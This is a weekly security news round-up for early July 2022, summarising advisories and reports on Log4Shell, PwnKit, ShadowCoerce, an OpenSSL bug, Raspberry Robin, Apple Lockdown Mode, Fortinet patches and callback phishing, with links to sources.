Weekly Security News Round-Up for July 1st -8th

Jul 11, 2022


CISA: "Cyber Threat Actors Exploit Log4Shell in VMware Horizon Systems".CISA: "Cyber Threat Actors Exploit Log4Shell in VMware Horizon Systems".

CISA and CGCYBER have produced a combined Cybersecurity Advisory to alert network defenders about state-sponsored APT attackers that continue to exploit Log4Shell in VMware Horizon and Unified Access Gateway servers to gain initial access to businesses.


https://cyware.com/news/cisa-advisory-cyber-threat-actors-exploits-log4shell-in-vmware-horizon-systems-2ed6d67e


CISA Warns Against Exploitation of PwnKit Linux Vulnerability.

CISA's Known Exploited Vulnerabilities Catalog was updated to include "PwnKit", a Linux vulnerability that is actively being exploited.


https://cyware.com/news/cisa-warns-against-exploitation-of-pwnkit-linux-vulnerability-42838c1b


Microsoft quietly fixes ShadowCoerce Windows NTLM Relay bug.

Microsoft addressed the 'ShadowCoerce' vulnerability in June 2022 updates, which allowed attackers to target Windows servers in NTLM relay attacks.


Threat actors may utilize this NTLM relay attack technique to take over unpatched Windows domains.


https://www.bleepingcomputer.com/news/microsoft/microsoft-quietly-fixes-shadowcoerce-windows-ntlm-relay-bug/?&web_view=true


High severity OpenSSL bug could lead to remote code execution.

An OpenSSL vulnerability might enable remote code execution on server-side devices.

OpenSSL is a cryptographic package that implements SSL and TLS open source.

It generates RSA private keys and performs encryption and decryption.


https://portswigger.net/daily-swig/high-severity-openssl-bug-could-lead-to-remote-code-execution?&web_view=true


Raspberry Robin Worm Targets Windows Users.

A Windows malware has infected hundreds of enterprises. The Raspberry Robin worm spreads on USB drives. Microsoft says it has identified 2019 worm artifacts,


https://cyware.com/news/raspberry-robin-worm-targets-windows-users-c1c6a343


Apple previews a new extreme security feature, Lockdown Mode.

Lockdown Mode is designed to protect users who face serious digital threats from NSO Group and other private companies that are developing state-sponsored mercenary spyware.


https://www.zdnet.com/article/apple-previews-lockdown-mode-a-new-extreme-security-feature/?web_view=true


Fortinet patches remedy multiple path traversal vulnerabilities

Fortinet fixed several endpoint security issues.


The California-based cybersecurity company published a large number of firmware and software upgrades on Tuesday. It accounts for more than a third of all firewall and unified threat management deployments globally (July 5).


Multiple relative route traversal issues in FortiDeceptor's administrative interface provide honeypots for network hackers (CVE-2022-30302).


https://portswigger.net/daily-swig/fortinet-patch-batch-remedies-multiple-path-traversal-vulnerabilities?&web_view=true


Google Project Zero Provides Insights About Zero-Days in 2022 So Far

Google Project Zero disclosed that around half of zero-day exploitations in H1 2022 were related to previous flaws not properly corrected. These details were revealed in a presentation at the FIRST conference titled ‘0-day In-the-Wild Exploitation in 2022…so far’.


https://cyware.com/news/google-project-zero-provides-insights-about-zero-days-in-2022-so-far-2ad2dffe


Callback Malware Campaigns Impersonate CrowdStrike and Other Cybersecurity Companies

CrowdStrike Intelligence discovered a callback phishing attack on July 8, 2022. The phishing email claims the recipient's firm has been hacked and asks them to contact a number. This campaign uses social-engineering strategies like WIZARD SPIDER's 2021 BazarCall campaign.


This operation will likely use RATs for initial access, penetration testing tools for lateral movement, and ransomware or data extortion.


https://www.crowdstrike.com/blog/callback-malware-campaigns-impersonate-crowdstrike-and-other-cybersecurity-companies/?&web_view=true